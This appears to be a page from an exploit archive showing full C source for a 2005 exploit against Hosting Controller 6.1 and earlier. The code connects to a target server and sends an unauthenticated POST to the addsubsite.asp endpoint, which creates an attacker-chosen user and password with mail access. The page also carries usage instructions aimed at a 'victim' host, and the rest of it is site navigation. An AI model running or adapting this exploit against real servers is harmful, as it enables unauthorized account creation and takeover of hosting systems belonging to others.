hosting061-2.c

hosting061-2.c: Posted May 27, 2005; Authored by Silentium | Site autistici.org; Hosting Controller versions 0.6.1 and below unauthenticated user registration exploit.; tags | exploit; SHA-256 | 4434f517881b4d5b9cb445b5c1bd4167df7c7b12358f5811dc9ff80bc496fc82; Download | Favorite | View

hosting061-2.c

/*****************************************************
*                                                    *
*  [Hosting Controller <= v6.1] exploit              *
*                                                    *
*  sileHOSTCxpl                                      *
*                                                    *
*  This exploit utilize two ways for exploiting      *
*  vulnerability present into Hosting Controller.    *
*  This exploit create new user with relative        *
*  passwd and registered your host with mail server  *
*  into Hosting Controller software ;\               *
*                                                    *
*  References: www.milw0rm.com/id.php?id=979         * 
*                                                    *
*  coded by: Silentium of Anacron Group Italy        *
*      date: 05/05/2005                              *
*    e-mail: anacrongroupitaly[at]autistici[dot]org  *
*   my_home: www.autistici.org/anacron.group-italy   *
*                                                    *
*  this tool is developed under GPL license          *
*  no(c) .:. copyleft                                *
*                                                    *
*****************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT1 80    // port of web server 
#define PORT2 8077    // port of hosting controller

void info(void);
void banner(void);
void sendxpl(FILE *out, char *argv[], int type);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);


int main(int argc, char *argv[]){

FILE *out;
int sock, sockconn, type;
struct sockaddr_in addr;
struct hostent *hp;

type = atoi(argv[6]);

if(argc!=7 || (type < 1) || (type > 2))
   info();

banner();
   
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
   errsock();
   
   printf("[*] Creating socket    [OK]\n");

if((hp = gethostbyname(argv[1])) == NULL)
   errgeth();
   
   printf("[*] Resolving victim host  [OK]\n");
   
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;

if(type == 1)
   addr.sin_port = htons(PORT1);
else
   addr.sin_port = htons(PORT2);
   
sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
   errconn(argv);
   
   printf("[*] Connecting at victim host   [OK]\n");
   
out = fdopen(sock,"a");
setbuf(out,NULL);

sendxpl(out,argv,type);

if(type == 1)
   printf("[*] Now test your username and password\n" 
          "    on http://%s/admin/\n\n",argv[1]);
else
   printf("[*] Now test your username and password\n"
          "    on http://%s:8077\n\n",argv[1]);

shutdown(sock,2);
close(sock);

return 0;

}


void info(void){

system("clear");
printf("\n\t         #########################################\n"
       "\t         #             sileHOSTCxpl              #\n"
       "\t         #  ###################################  #\n"
       "\t         #          Hosting Controller           #\n"
       "\t         #           <= v6.1 exploit             #\n"
       "\t         #   Unauthenticated User Registration   #\n"
       "\t         #          coded by Silentium           #\n"            
       "\t         #        [ Anacron Group Italy ]        #\n"
       "\t         #  ###################################  #\n"
       "\t         # www.autistici.org/anacron-group-italy #\n"
       "\t         #########################################\n\n"
       " [Usage]\n\n" 
       "  sileHOSTCxpl <victim> <username> <password> <your_host> <mailserver> <type>\n\n"
       "        [Type]\n\n"
       "              1) web server daemon     [port 80]\n"
       "              2) hosting controller daemon [port 8077]\n\n"
       " [Example]\n\n"
       "  sileHOSTCxpl www.victim.com sile silePass anacrongroup.org imail 1\n\n"); 
exit(1);

}


void banner(void){

system("clear");
printf("[-] sileHOSTCxpl\n"
       "    ============\n"
       "[-] Hosting Controller <= v6.1 exploit\n"
       "[-] coded by Silentium - Anacron Group Italy\n"
       "[-] www.autistici.org/anacron-group-italy\n\n");
       
}
       

void sendxpl(FILE *out, char *argv[], int type){

int size = 132;

size+=strlen(argv[2]);
size+=strlen(argv[3]);
size+=strlen(argv[4]);
size+=strlen(argv[5]);
    
if(type == 1)    
    fprintf(out,"POST /admin/hosting/addsubsite.asp HTTP/1.0\n"
                "Connection: Keep-Alive\n"
                "Pragma: no-cache\n"
                "Cache-control: no-cache\n"
                "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
                "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
                "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
                "Accept-Language: en\n"
                "Host: %s\n"
                "Content-Type: application/x-www-form-urlencoded\n"
                "Content-Length: %d\n\n"
                "reseller=resadmin&domaintypecheck=SECOND&DomainName=%s&loginname=%s&"
                "Quota=-1&htype=27&choice=1&mailaccess=TRUE&MailServerType=%s&password"
                "=%s",argv[1],size,argv[4],argv[2],argv[5],argv[3]); 
else
    fprintf(out,"POST /hosting/addsubsite.asp HTTP/1.0\n"
                "Connection: Keep-Alive\n"
                "Pragma: no-cache\n"
                "Cache-control: no-cache\n"
                "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
                "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
                "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
                "Accept-Language: en\n"
                "Host: %s\n"
                "Content-Type: application/x-www-form-urlencoded\n"
                "Content-Length: %d\n\n"
                "reseller=resadmin&domaintypecheck=SECOND&DomainName=%s&loginname=%s&"
                "Quota=-1&htype=27&choice=1&mailaccess=TRUE&MailServerType=%s&password"
                "=%s",argv[1],size,argv[4],argv[2],argv[5],argv[3]);
                                                                                                                                                                                                                                     
                                  
                 printf("[*] Sending exploit    [OK]\n\n");

}
            
                 
void errsock(void){

system("clear");
printf("[x] Creating socket  [FAILED]\n\n");
exit(1);

}


void errgeth(void){

printf("[x] Resolving victim host  [FAILED]\n\n");
exit(1);

}


void errconn(char *argv[]){

printf("[x] Connecting at victim host  [FAILED]\n\n",argv[1]);
exit(1);

}

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

hosting061-2.c

hosting061-2.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

hosting061-2.c

Share This

hosting061-2.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems